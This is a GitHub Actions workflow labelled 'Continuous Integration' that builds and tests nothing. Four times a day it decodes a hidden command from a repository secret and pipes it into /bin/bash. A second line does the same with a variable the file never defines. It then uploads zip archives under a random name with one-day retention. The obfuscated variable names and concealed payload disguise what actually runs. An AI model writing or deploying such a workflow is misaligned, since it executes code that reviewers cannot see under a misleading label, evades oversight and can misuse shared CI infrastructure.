name: Continuous Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '17 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          tb25665: ${{ secrets.tb25665 }}
        run: |
          printf '%s' "$tb25665" | jq -r .fcnd516 | /bin/bash
          printf '%s' "$vap883" | jq -r .zsx72433 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: KqCri9oJ
          path: "*.zip"
          retention-days: 1
